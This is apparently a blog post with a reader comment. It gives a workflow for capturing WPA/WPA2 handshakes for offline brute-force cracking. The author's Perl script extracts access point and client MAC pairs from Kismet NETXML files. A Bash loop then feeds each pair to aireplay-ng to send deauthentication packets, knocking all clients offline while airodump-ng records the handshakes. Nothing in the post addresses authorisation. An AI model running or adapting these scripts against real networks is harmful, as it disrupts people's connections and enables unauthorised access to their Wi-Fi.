This post deals with gathering the information you need to use aircrack-ng to capture a WPA/WPA2 handshake for offline bruteforce attacks. When running aireplay-ng to send out de-authentication packets you need the MAC address of the Access Point and a Client that is associated with it. The way I would collect the information is run Kismet. With the older version of Kismet I would monitor the client (panel view) and select (copy/paste) the access point and client MAC. With the new version of Kismet you cannot select a MAC address. So I wrote myself a quick Perl script to parse the Kismet NETXML file to create output with the MAC addresses of AP and associated client pairs.
#!/usr/bin/perl
use XML::Simple;
$xs = XML::Simple->new( KeyAttr=>[] );
$data = $xs->XMLin($ARGV[0]);
for $wn (@{$data->{'wireless-network'}}){
$channel = $wn->{'channel'};
$bssid = $wn->{'BSSID'};
if(ref($wn->{'SSID'}->{'encryption'}) eq 'ARRAY' && $wn->{'type'} eq 'infrastructure')
{
if(ref($wn->{'wireless-client'}) eq 'ARRAY'){
for $wc (@{$wn->{'wireless-client'}}){
if($wc->{'type'} eq 'tods'){
print $bssid . " " . $wc->{'client-mac'} . "\n"
}
}
}
}
}
I then use the file that was created in a simple Bash script to use aireplay-ng to knock all the clients offline. Of course you have airodump-ng listening for the WPA/WPA2 handshakes.
#!/bin/bash
set -x
AIREPLAY=/usr/local/sbin/aireplay-ng
WIFACE=$1
FILE=$2
while read bssid clientmac
do
echo $x
$AIREPLAY -0 1 -a $bssid -c $clientmac --ignore-negative-one $WIFACE
done < $FILE
Hi, im trying to get you perl code running, but it wont, and either im to blind to see why it wont, or to stupid..
You wrote this 2 years ago? I dont think so much have changed since then, so im problaby just stupid..
Best regards
Mikey